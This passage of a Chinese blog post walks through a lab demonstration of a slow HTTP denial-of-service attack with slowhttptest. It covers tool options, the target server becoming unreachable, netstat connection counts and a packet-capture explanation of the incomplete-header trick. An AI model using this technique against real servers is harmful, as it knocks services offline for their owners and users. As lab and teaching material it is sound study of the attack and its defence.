<li>-t 动词 要使用的自定义动词</li>
<li>-u URL 目标URL，与您在浏览器中键入的格式相同</li>
<li>-x 字节 随访数据的最大长度</li>
<li>-p 秒 等待探针连接上的HTTP响应超时，此后服务器被视为不可访问</li>
</ul>
<p>攻击前，利用curl命令来请求Web服务器，正常</p>
<p><img src="/images/postimage/ddos17.png" srcset="/img/loading.gif" lazyload alt="" /></p>
<p>输入命令、发起攻击，可以观察到随着时间的流逝，从第10秒开始，service available就会从yes变为no，说明服务器已经挂了，再刷新网页的时候，又会显示无法连接。ctrl+C结束攻击。</p>
<p><img src="/images/postimage/ddos18.png" srcset="/img/loading.gif" lazyload alt="" /></p>
<p>攻击后使用curl请求Web服务器，异常</p>
<p><img src="/images/postimage/ddos19.png" srcset="/img/loading.gif" lazyload alt="" /></p>
<p>服务器端查看建立的连接数</p>
<p>命令：<code>netstat -pantu | grep ESTABLISHED</code></p>
<p><img src="/images/postimage/ddos20.png" srcset="/img/loading.gif" lazyload alt="" /></p>
<p>命令：<code>netstat -pantu | grep ESTABLISHED ｜ wc -l</code></p>
<p><img src="/images/postimage/ddos21.png" srcset="/img/loading.gif" lazyload alt="" /></p>
<p>抓包验证攻击手法</p>
<p><img src="/images/postimage/ddos22.png" srcset="/img/loading.gif" lazyload alt="" /></p>
<p>抓到的包通过追踪TCP流可以发现结尾添加了X-***，将ASCII码数据转换为原始数据</p>
<p><img src="/images/postimage/ddos23.png" srcset="/img/loading.gif" lazyload alt="" /></p>
<p>可以看到原始数据结尾是0d0a，0d表示\r,0a表示\n，也就是说结尾是\r\n。而正常的请求头结尾应该是\r\n\r\n，如果以\r\n结尾，服务器就会认为客户端的数据还没传输完，就需要一直保持连接直到超时。从而实现攻击。</p>
<blockquote>
<p><strong>参考资料：</strong></p>
<ol>
<li><a target="_blank" rel="noopener" href="https://zh.wikipedia.org/wiki/%E9%98%BB%E6%96%B7%E6%9C%8D%E5%8B%99%E6%94%BB%E6%93%8A">拒绝服务攻击</a></li>
<li><a target="_blank" rel="noopener" href="https://mochazz.github.io/2017/09/11/DDOS1/">DDOS原理与防御</a></li>
<li><a target="_blank" rel="noopener" href="https://mochazz.github.io/2017/09/11/DDOS2/">DDOS攻击模拟复现</a></li>
<li><a target="_blank" rel="noopener" href="https://blog.csdn.net/zzr2zr/article/details/85733979">DDoS攻击模拟与Metasploitable渗透</a></li>
<li><a target="_blank" rel="noopener" href="https://blog.csdn.net/Bulldozer_GD/article/details/106379021">Kali linux 渗透测试（六）——Metasploitable2安装使用</a></li>
<li><a target="_blank" rel="noopener" href="https://www.youtube.com/watch?v=bqdu_0JtkPI">Metasploitable 2 on ARM</a></li>
<li><a target="_blank" rel="noopener" href="https://scapy.readthedocs.io/en/latest/index.html">Scapy’s documentation</a></li>
<li><a target="_blank" rel="noopener" href="https://blog.csdn.net/fageweiketang/article/details/103516566">Python-Scapy使用介绍</a></li>
<li><a target="_blank" rel="noopener" href="https://blog.csdn.net/qq_23933415/article/details/111212898">模型的参数verbose用法详解</a></li>
<li><a target="_blank" rel="noopener" href="https://blosslom1.github.io/2020/07/09/python%E7%BD%91%E7%BB%9C%E9%80%9A%E8%AE%AF/#scapy">Python网络通讯</a></li>
<li><a target="_blank" rel="noopener" href="https://www.cnblogs.com/endust/p/11960901.html">HTTP慢速攻击</a></li>
<li><a target="_blank" rel="noopener" href="https://www.yixuebiancheng.com/article/77750.html">slowhttptest慢速攻击工具使用详解</a></li>
</ol>
</blockquote>

            </div>
            <hr>
            <div>
              <div class="post-metas mb-3">
                
                  <div class="post-meta mr-3">
                    <i class="iconfont icon-category"></i>
                    
                      <a class="hover-with-bg" href="/categories/%E6%8A%80%E6%9C%AF/">技术</a>
                    
                      <a class="hover-with-bg" href="/categories/%E6%8A%80%E6%9C%AF/%E7%BD%91%E7%BB%9C%E6%94%BB%E9%98%B2%E5%AE%9E%E6%88%98/">网络攻防实战</a>
                    
                  </div>
                
                
                  <div class="post-meta">
                    <i class="iconfont icon-tags"></i>
                    
                      <a class="hover-with-bg" href="/tags/DDoS/">DDoS</a>
                    
                  </div>
                
              </div>
              
                <p class="note note-warning">
                  
                    本博客所有文章除特别声明外，均采用 <a target="_blank" href="https://creativecommons.org/licenses/by-sa/4.0/deed.zh" rel="nofollow noopener noopener">CC BY-SA 4.0 协议</a> ，转载请注明出处！
                  
                </p>
              
              
                <div class="post-prevnext">
                  <article class="post-prev col-6">
                    
                    
                      <a href="/posts/9e515245.html">
                        <i class="iconfont icon-arrowleft"></i>
                        <span class="hidden-mobile">数据包结构分析</span>
                        <span class="visible-mobile">上一篇</span>
                      </a>
                    
                  </article>
                  <article class="post-next col-6">
                    
                    
                      <a href="/posts/61920cbb.html">
                        <span class="hidden-mobile">Socket编程</span>
                        <span class="visible-mobile">下一篇</span>
                        <i class="iconfont icon-arrowright"></i>
                      </a>
                    
                  </article>
                </div>
              
            </div>

            
              <!-- Comments -->
              <article class="comments" id="comments" lazyload>
                
                  
                
                
  <div id="waline"></div>
  <script type="text/javascript">
    Fluid.utils.loadComments('#waline', function() {
      Fluid.utils.createScript('https://cdn.jsdelivr.net/npm/@waline/client@1/dist/Waline.min.js', function() {
        var options = Object.assign(
          {"serverURL":"https://blog-comment-eta.vercel.app/","path":"window.location.pathname","placeholder":null,"meta":["nick","mail","link"],"requiredMeta":["nick"],"lang":"zh-CN","emoji":["https://cdn.jsdelivr.net/gh/walinejs/emojis/weibo"],"dark":"html[data-user-color-scheme=\"dark\"]","avatar":"retro","avatarCDN":"https://seccdn.libravatar.org/avatar/","avatarForce":false,"wordLimit":0,"pageSize":10,"highlight":true},
          {
            el: '#waline',
            path: window.location.pathname
          }
        )
        new Waline(options);
        Fluid.utils.waitElementVisible('#waline .vcontent', () => {
          Fluid.plugins.initFancyBox('#waline .vcontent img:not(.vemoji)');
        })
      });
    });
  </script>
  <noscript>Please enable JavaScript to view the comments</noscript>


              </article>
            
          </article>
        </div>
      </div>
    </div>
    
      <div class="d-none d-lg-block col-lg-2 toc-container" id="toc-ctn">
        <div id="toc">
  <p class="toc-header"><i class="iconfont icon-list"></i>&nbsp;目录</p>
  <div class="toc-body" id="toc-body"></div>
</div>

      </div>
    
  </div>
</div>

<!-- Custom -->


    

    
      <a id="scroll-top-button" aria-label="TOP" href="#" role="button">
        <i class="iconfont icon-arrowup" aria-hidden="true"></i>
      </a>
    

    
      <div class="modal fade" id="modalSearch" tabindex="-1" role="dialog" aria-labelledby="ModalLabel"
     aria-hidden="true">
  <div class="modal-dialog modal-dialog-scrollable modal-lg" role="document">
    <div class="modal-content">
      <div class="modal-header text-center">
        <h4 class="modal-title w-100 font-weight-bold">搜索</h4>
        <button type="button" id="local-search-close" class="close" data-dismiss="modal" aria-label="Close">
          <span aria-hidden="true">&times;</span>
        </button>
      </div>
      <div class="modal-body mx-3">
        <div class="md-form mb-5">
          <input type="text" id="local-search-input" class="form-control validate">
          <label data-error="x" data-success="v"
                 for="local-search-input">关键词</label>
        </div>
        <div class="list-group" id="local-search-result"></div>
      </div>
    </div>
  </div>
</div>
    

    
  </main>

  <footer class="text-center mt-5 py-3">
  <div class="footer-content">
     <a href="https://hexo.io" target="_blank" rel="nofollow noopener"><span>Hexo</span></a> <i class="iconfont icon-love"></i> <a href="https://github.com/fluid-dev/hexo-theme-fluid" target="_blank" rel="nofollow noopener"><span>Fluid</span></a> 
  </div>
  
  <div class="statistics">
    
    

    
      
        <!-- LeanCloud 统计PV -->
        <span id="leancloud-site-pv-container" style="display: none">
            总访问量 
            <span id="leancloud-site-pv"></span>
             次
          </span>
      
      
        <!-- LeanCloud 统计UV -->
        <span id="leancloud-site-uv-container" style="display: none">
            总访客数 
            <span id="leancloud-site-uv"></span>
             人
          </span>
      

    
  </div>


  

  
</footer>


  <!-- SCRIPTS -->
  
  <script  src="https://cdn.jsdelivr.net/npm/nprogress@0/nprogress.min.js" ></script>
  <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/nprogress@0/nprogress.min.css" />

  <script>
    NProgress.configure({"showSpinner":false,"trickleSpeed":100})
    NProgress.start()
    window.addEventListener('load', function() {
      NProgress.done();
    })
  </script>


<script  src="https://cdn.jsdelivr.net/npm/jquery@3/dist/jquery.min.js" ></script>
<script  src="https://cdn.jsdelivr.net/npm/bootstrap@4/dist/js/bootstrap.min.js" ></script>
<script  src="/js/events.js" ></script>
<script  src="/js/plugins.js" ></script>

<!-- Plugins -->


  <script  src="/js/local-search.js" ></script>



  
    <script  src="/js/img-lazyload.js" ></script>
  



  
    
  



  
    <script  src="https://cdn.jsdelivr.net/npm/tocbot@4/dist/tocbot.min.js" ></script>
  
  
    <script  src="https://cdn.jsdelivr.net/npm/@fancyapps/fancybox@3/dist/jquery.fancybox.min.js" ></script>
  
  
    <script  src="https://cdn.jsdelivr.net/npm/anchor-js@4/anchor.min.js" ></script>
  
  
    <script defer src="https://cdn.jsdelivr.net/npm/clipboard@2/dist/clipboard.min.js" ></script>
  




  <script defer src="/js/leancloud.js" ></script>



  <script  src="https://cdn.jsdelivr.net/npm/typed.js@2/lib/typed.min.js" ></script>
  <script>
    (function (window, document) {
      var typing = Fluid.plugins.typing;
      var title = document.getElementById('subtitle').title;
      
        typing(title);
      
    })(window, document);
  </script>





  

  
    <!-- KaTeX -->
    <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/katex@0/dist/katex.min.css" />
  








  
    <!-- Baidu Analytics -->
    <script defer>
      var _hmt = _hmt || [];
      (function () {
        var hm = document.createElement("script");
        hm.src = "https://hm.baidu.com/hm.js?0aae2bb9475d846643a0f05755d8a37b";
        var s = document.getElementsByTagName("script")[0];
        s.parentNode.insertBefore(hm, s);
      })();
    </script>
  

  

  

  

  

  





<!-- 主题的启动项 保持在最底部 -->
<script  src="/js/boot.js" ></script>


<script src="/live2dw/lib/L2Dwidget.min.js?094cbace49a39548bed64abff5988b05"></script><script>L2Dwidget.init({"pluginRootPath":"live2dw/","pluginJsPath":"lib/","pluginModelPath":"assets/","tagMode":false,"model":{"jsonPath":"/live2dw/assets/wanko.model.json"},"display":{"position":"right","width":150,"height":300},"mobile":{"show":"true#是否在手机端显示"},"log":false});</script></body>
</html>
